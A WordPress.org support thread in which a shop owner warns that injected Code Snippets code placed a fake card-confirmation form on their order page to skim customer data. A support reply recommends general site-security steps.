Title: Malicious Code Last modified: January 9, 2025 --- # Malicious Code * Resolved [conors37](https://wordpress.org/support/users/conors37/) * (@conors37) * [1 year, 5 months ago](https://wordpress.org/support/topic/malicious-code-27/) * Hi, * I’m creating this topic to make your support team aware of this issue and also to urge anyone who sees this to check their code snippets for malicious code. * Yesterday a customer sent us a picture of our order received page. This is our page that displays the order summary to the customer after the payment has been processed. On this page their was a form injected at the top of the page prompting the user to input their card details again to confirm their purchase. * I placed the website in maintenance mode and inspected the form. The form contains the customers billing information which is hidden. So if the customer was to submit the form all their billing information and their card details are sent to the URL in the form which is dic.ngo. I’ve reported this domain to their registrar. * I discovered that malicious code was present in multiple code snippets. Our website’s security is stringent and something like this would usually be flagged but this was not. I’m not accusing Code Snippets of begin responsible for this. I just want people to be aware of this. I would call this a sophisticated attack compared to most phishing attempts. They used the code snippet plugin to add the malicious code that injects the form so our website security was unaware. * Be careful out there people. * Conor Viewing 1 replies (of 1 total) * [pauserratgutierrez](https://wordpress.org/support/users/pauserratgutierrez/) * (@pauserratgutierrez) * [1 year, 4 months ago](https://wordpress.org/support/topic/malicious-code-27/#post-18235890) * Hi [@conors37](https://wordpress.org/support/users/conors37/), * Thank you for bringing this to our attention. We take security very seriously and understand your concerns regarding the malicious code injected into your code snippets. * The Code Snippets plugin is a tool that allows users to add custom code to their WordPress sites. While the plugin itself doesn’t have any known vulnerabilities at this time, it’s possible for malicious actors to gain unauthorized access to a site through other means and insert harmful code. * To enhance your site’s security, we recommend the following steps: 1. **Review User Access**: Ensure that only trusted individuals have administrative access to your WordPress dashboard. 2. **Update All Plugins and Themes**: Regularly updating all components of your site can help protect against known vulnerabilities. 3. **Implement Security Measures**: Consider using security plugins that offer features like malware scanning and firewall protection. 4. **Monitor Code Snippets**: Regularly review your code snippets for any unauthorized changes or additions. * Best regards, Pau. Viewing 1 replies (of 1 total) The topic ‘Malicious Code’ is closed to new replies. * ![](https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878) * [Code Snippets](https://wordpress.org/plugins/code-snippets/) * [Frequently Asked Questions](https://wordpress.org/plugins/code-snippets/#faq) * [Support Threads](https://wordpress.org/support/plugin/code-snippets/) * [Active Topics](https://wordpress.org/support/plugin/code-snippets/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/code-snippets/unresolved/) * [Reviews](https://wordpress.org/support/plugin/code-snippets/reviews/) ## Tags * [form](https://wordpress.org/support/topic-tag/form/) * [hacked](https://wordpress.org/support/topic-tag/hacked/) * [phishing](https://wordpress.org/support/topic-tag/phishing/) * 2 replies * 2 participants * Last reply from: [pauserratgutierrez](https://wordpress.org/support/users/pauserratgutierrez/) * Last activity: [1 year, 4 months ago](https://wordpress.org/support/topic/malicious-code-27/#post-18235890) * Status: resolved